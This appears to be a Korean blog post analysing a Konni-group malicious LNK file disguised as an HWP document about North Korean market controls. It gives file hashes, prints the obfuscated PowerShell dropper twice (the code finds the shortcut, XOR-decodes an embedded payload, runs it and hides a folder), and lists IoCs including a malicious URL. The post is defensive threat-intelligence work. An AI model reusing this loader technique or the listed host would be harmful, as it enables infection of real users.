북한 해킹 단체 Konni(코니) 에서 만든 악성코드-북한 내부정보시장통제 관련 내부 동향 및 물가.hwp.lnk(2024.4.4)
Contents
오늘은 북한 해킹 단체 Konni(코니) 에서 만든 악성코드인 북한 내부정보시장통제 관련 내부 동향 및 물가.hwp.lnk(2024.4.4)에 대해 글을 적어 보겠습니다. 해당 악성코드는 hwp 즉 한글과 컴퓨터에서 만든 HWP 첨부 파일처럼 돼 있는 lnk 파일이며 해당 악성코드를 hwp 즉 한글과 컴퓨터에서 만든 HWP 로 생각을 하고 실행을 하면 PowerShell(파워셀)를 통해서 해당 악성코드가 동작하게 구성이 돼 있습니다. 먼저 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명: 북한 내부정보시장통제 관련 내부 동향 및 물가.hwp.lnk
사이즈:161 KB
MD5:3334d2605c0df26536058f73a43cb074
SHA-1:ebcd247c5ff2babe6ad1f001b4827549391c515c
SHA-256:ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015
PowerShell(파워셀) 코드
c zyBeQRaffsdBmhotKxfTsLks(y)VdfYfmvNPf(N)CunXYTuCBdHAcfYzydPPoiFUNVhagGQ xcARpkhUyqGQvnBcSgMXJZqytPsjcLtwVoixAoJorioxG(t)j(F)jTpUtKfyMcvzSXRPWjVgedz BwwEzKSSaEMajuzckhKMyThvtrzAvxcAfrMvXeEPUjvVfXGsvgKYurbKoakhjquABjV(S)HdffB VSpvmqwLgepPdgNpcgWUwECPUsVcPLsbCuyyMobKNwckfNxdgAFWimfqozAUuuWvMnjHG(n)CPe mfZAsHgURVm(e)vTrpikkMhoszGxSBRvTYSRWffPVSuZCyKqquTsxcscXYNxUVRCduconFWkitq sqhKTRqhwJx(Y)Q(F)PU(Y)sH(V)ab9R(W)ivucKxHieMZLPoUGCMsVFvmHxMYSAyprymzvuowY boTdGdeJyaqnHWqNjNCYyQHFv(H)mBNwkppuTqBhbuGoszhcJCW(N)mHKxxkFnHYSBWbPaXncZj bLhrjwhwtYHGakBERWGLpzcCesrMgevzWBkXBgnPwR(n)aiWVRkugrunVzHCnSeuppBhKwZFcKHT nxmcuiwAzLYeeHHLpYUvKczYxbkxRFsvJBZvnEidtCVCqxcbPopeRmikYn(E)tXZKVsAuBJmwKQQ bfgWGZZiJBpnFwtPwZaPfuTZkQcysAREpajcdbFEuNphEfWYiUPwKaJGmhLSXyRgLKYEmrKvsu(t)re LueTeqxNsVprCQWqPHVXhvUhqLRjseoFq0002858AtrQHnJANfENxuXpzXBtyntoGJabo(i)KQQMENd eycbownyzgWEkmJvxJeadhZnHnCuQXMQimvxyrjRfQfAewcXbtrdzNaWyQtbTSKBufvZRjWfxnUnbwi kkF(t)vFJoumyYJYiXofBgYadgRwkEnTMUcGhQnxoXMRaNqknhppFhxqjjgyBYudbByEWcQsKRSFugaq REjcpXnEuLvYJPV(p)BHQxnMpjrWFQqTVdiRHYPrPeoVijFSKWWAdMrBcepZKsqxnBRsPSfXzjUKirB eEzmJUPQiLGNCHQGuNRGGtmdSRZb(T)SHtKAkujgHEyMGHgeAoLCyWrLWKrwtTV||goto&po^w^e^rs he^l^l -windowstyle hidd(e)n function UJw(u)ElHWKh(){$ksGFWhHpfZ=Get-ChildItem *.lnk;$ksGFWhHpfZ=$k(s)GFWhHpfZ^|where-object{$_.length -eq 0x0002858A};$zHWgpc hixy(=)$ksGFWh(H)pfZ;$ksGFWhHpfZ=$ksGFWhHpfZ^|Select-Object -ExpandProperty Nam e;if($ksGFWhHpfZ(.)length -eq 0){cd $env:TEMP;$ksGFWhHpfZ=Get-ChildItem *(.)ln k;$k(s)GFWhHpfZ=$ksGFWhHpfZ^|where-object {$_.length -eq 0x0(0)02858A} ;$zHWgpc hixy=$ksGFWhH(p)fZ;$ksGFWh(H)pfZ=$ksGFWhHpfZ^|Select-Object -ExpandProperty Nam e;}return @($ksGFWhHpfZ, $zHWgpchi(x)y)};function xnMzgCQGES(){$zdLIXjAqBy=UJwu ElHWKh;$ksG(F)WhHpfZ=$zdLIXjAqBy[0];$ksGFWhHpfZ=$ksGFWhHpfZ.substring(0,$ksGFWh HpfZ.length-4);return $k(s)GFWhHpfZ};function msGSqHXiPb{$zdLIXjAqBy=xnMzgCQGES ;$(p)ovIjhOBgz(=)UJwuElHWKh(;)$ksGFWhHpfZ=$povIjhOBgz[0];$IUihtynbEF=[System.IO .BinaryReader]::n(e)w([System.IO.File]::(o)pen($ksGFWhHpfZ,[System.IO.FileMode] ::Open,[System.IO(.)FileAccess]::ReadWrite,[System(.)IO.FileShare]::None));try{ $IUihtynbEF.BaseStream.Seek(0x(0)0001DF1,[System(.)IO.SeekOrigin]::Beg(i)n);$Oz SR(Y)WosVJ=$IUihtynbEF.ReadBytes(0x0(0)00CE00);}finally{$IUihtynbEF.Close()};fo r($RJPVDAeoNg=0; $RJPVDAeoNg -lt $OzSRYWosVJ.coun(t); $RJP(V)DAeoNg++) { $OzSRY WosVJ[$RJPVD(A)eoNg]=$OzSRY(W)osVJ[$RJP(V)DAeoNg] -(b)xor 0xA1 };[System.IO(.)F ile]::W(r)iteAllBytes($zdL(I)XjAqBy,$OzSRYWosVJ);$yujRnfzHNA='.\'(+)$zdLIXjAqBy ;^& $yujR(n)fzHNA;return 'npXIZBhRQd'};$yuj(R)nfzHNA=msGSqHXiPb(;)$eHjrSJd(k)NK =UJwuElHWKh;remove-item -path $eHjrSJdkNK[1] -forc(e);&mkdir c:\LNjyqJhtie (&) attrib +h c:\LNj(y)qJhtie & cd /d c:\LNjyqJhti(e) & …
파일명: 북한 내부정보시장통제 관련 내부 동향 및 물가.hwp.lnk
사이즈:161 KB
MD5:3334d2605c0df26536058f73a43cb074
SHA-1:ebcd247c5ff2babe6ad1f001b4827549391c515c
SHA-256:ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015
PowerShell(파워셀) 코드
c zyBeQRaffsdBmhotKxfTsLks(y)VdfYfmvNPf(N)CunXYTuCBdHAcfYzydPPoiFUNVhagGQ xcARpkhUyqGQvnBcSgMXJZqytPsjcLtwVoixAoJorioxG(t)j(F)jTpUtKfyMcvzSXRPWjVgedz BwwEzKSSaEMajuzckhKMyThvtrzAvxcAfrMvXeEPUjvVfXGsvgKYurbKoakhjquABjV(S)HdffB VSpvmqwLgepPdgNpcgWUwECPUsVcPLsbCuyyMobKNwckfNxdgAFWimfqozAUuuWvMnjHG(n)CPe mfZAsHgURVm(e)vTrpikkMhoszGxSBRvTYSRWffPVSuZCyKqquTsxcscXYNxUVRCduconFWkitq sqhKTRqhwJx(Y)Q(F)PU(Y)sH(V)ab9R(W)ivucKxHieMZLPoUGCMsVFvmHxMYSAyprymzvuowY boTdGdeJyaqnHWqNjNCYyQHFv(H)mBNwkppuTqBhbuGoszhcJCW(N)mHKxxkFnHYSBWbPaXncZj bLhrjwhwtYHGakBERWGLpzcCesrMgevzWBkXBgnPwR(n)aiWVRkugrunVzHCnSeuppBhKwZFcKHT nxmcuiwAzLYeeHHLpYUvKczYxbkxRFsvJBZvnEidtCVCqxcbPopeRmikYn(E)tXZKVsAuBJmwKQQ bfgWGZZiJBpnFwtPwZaPfuTZkQcysAREpajcdbFEuNphEfWYiUPwKaJGmhLSXyRgLKYEmrKvsu(t)re LueTeqxNsVprCQWqPHVXhvUhqLRjseoFq0002858AtrQHnJANfENxuXpzXBtyntoGJabo(i)KQQMENd eycbownyzgWEkmJvxJeadhZnHnCuQXMQimvxyrjRfQfAewcXbtrdzNaWyQtbTSKBufvZRjWfxnUnbwi kkF(t)vFJoumyYJYiXofBgYadgRwkEnTMUcGhQnxoXMRaNqknhppFhxqjjgyBYudbByEWcQsKRSFugaq REjcpXnEuLvYJPV(p)BHQxnMpjrWFQqTVdiRHYPrPeoVijFSKWWAdMrBcepZKsqxnBRsPSfXzjUKirB eEzmJUPQiLGNCHQGuNRGGtmdSRZb(T)SHtKAkujgHEyMGHgeAoLCyWrLWKrwtTV||goto&po^w^e^rs he^l^l -windowstyle hidd(e)n function UJw(u)ElHWKh(){$ksGFWhHpfZ=Get-ChildItem *.lnk;$ksGFWhHpfZ=$k(s)GFWhHpfZ^|where-object{$_.length -eq 0x0002858A};$zHWgpc hixy(=)$ksGFWh(H)pfZ;$ksGFWhHpfZ=$ksGFWhHpfZ^|Select-Object -ExpandProperty Nam e;if($ksGFWhHpfZ(.)length -eq 0){cd $env:TEMP;$ksGFWhHpfZ=Get-ChildItem *(.)ln k;$k(s)GFWhHpfZ=$ksGFWhHpfZ^|where-object {$_.length -eq 0x0(0)02858A} ;$zHWgpc hixy=$ksGFWhH(p)fZ;$ksGFWh(H)pfZ=$ksGFWhHpfZ^|Select-Object -ExpandProperty Nam e;}return @($ksGFWhHpfZ, $zHWgpchi(x)y)};function xnMzgCQGES(){$zdLIXjAqBy=UJwu ElHWKh;$ksG(F)WhHpfZ=$zdLIXjAqBy[0];$ksGFWhHpfZ=$ksGFWhHpfZ.substring(0,$ksGFWh HpfZ.length-4);return $k(s)GFWhHpfZ};function msGSqHXiPb{$zdLIXjAqBy=xnMzgCQGES ;$(p)ovIjhOBgz(=)UJwuElHWKh(;)$ksGFWhHpfZ=$povIjhOBgz[0];$IUihtynbEF=[System.IO .BinaryReader]::n(e)w([System.IO.File]::(o)pen($ksGFWhHpfZ,[System.IO.FileMode] ::Open,[System.IO(.)FileAccess]::ReadWrite,[System(.)IO.FileShare]::None));try{ $IUihtynbEF.BaseStream.Seek(0x(0)0001DF1,[System(.)IO.SeekOrigin]::Beg(i)n);$Oz SR(Y)WosVJ=$IUihtynbEF.ReadBytes(0x0(0)00CE00);}finally{$IUihtynbEF.Close()};fo r($RJPVDAeoNg=0; $RJPVDAeoNg -lt $OzSRYWosVJ.coun(t); $RJP(V)DAeoNg++) { $OzSRY WosVJ[$RJPVD(A)eoNg]=$OzSRY(W)osVJ[$RJP(V)DAeoNg] -(b)xor 0xA1 };[System.IO(.)F ile]::W(r)iteAllBytes($zdL(I)XjAqBy,$OzSRYWosVJ);$yujRnfzHNA='.\'(+)$zdLIXjAqBy ;^& $yujR(n)fzHNA;return 'npXIZBhRQd'};$yuj(R)nfzHNA=msGSqHXiPb(;)$eHjrSJd(k)NK =UJwuElHWKh;remove-item -path $eHjrSJdkNK[1] -forc(e);&mkdir c:\LNjyqJhtie (&) attrib +h c:\LNj(y)qJhtie & cd /d c:\LNjyqJhti(e) & …
IoC
3334d2605c0df26536058f73a43cb074
ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015
ebcd247c5ff2babe6ad1f001b4827549391c515c
https://www.cammirando.com/wp-admin/css/temp/movement/
ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015
ebcd247c5ff2babe6ad1f001b4827549391c515c
https://www.cammirando.com/wp-admin/css/temp/movement/